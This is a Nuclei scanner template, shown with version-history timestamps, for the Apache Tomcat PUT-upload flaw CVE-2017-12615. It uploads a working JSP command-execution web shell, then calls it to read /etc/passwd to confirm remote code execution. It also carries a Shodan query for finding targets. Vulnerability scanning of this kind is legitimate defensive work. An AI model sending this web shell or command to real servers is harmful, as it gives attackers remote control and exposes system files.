nuclei-templates/http/cves/2017/CVE-2017-12615.yaml

70 lines
2.8 KiB
YAML
Raw Normal View History

id: CVE-2017-12615
info:
name: Apache Tomcat Servers - Remote Code Execution
author: pikpikcu
severity: high
description: |
Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat.
reference:
- https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
- https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E
- http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392
- https://nvd.nist.gov/vuln/detail/CVE-2017-12615
2023-07-15 16:29:17 +00:00
- http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-12615
cwe-id: CWE-434
2023-07-11 19:49:27 +00:00
epss-score: 0.97499
epss-percentile: 0.99973
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*
2022-07-04 13:05:02 +00:00
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: apache
product: tomcat
2023-09-06 13:22:34 +00:00
shodan-query: title:"Apache Tomcat"
2023-07-12 11:56:50 +00:00
tags: rce,tomcat,kev,vulhub,cve,cve2017,apache,fileupload,intrusive
http:
- method: PUT
path:
- "{{BaseURL}}/poc.jsp/"
2023-07-11 19:49:27 +00:00
body: |
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
2023-07-11 19:49:27 +00:00
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100993c04bc418465f7700745bde3b4119d547c478c8218cf2cefa34814487614de022100b2c6413901e0d22384134b397f311ef7f4fbcbdf133be37bcb15556d7f2b6952:922c64590222798bb761d5b6d8e72950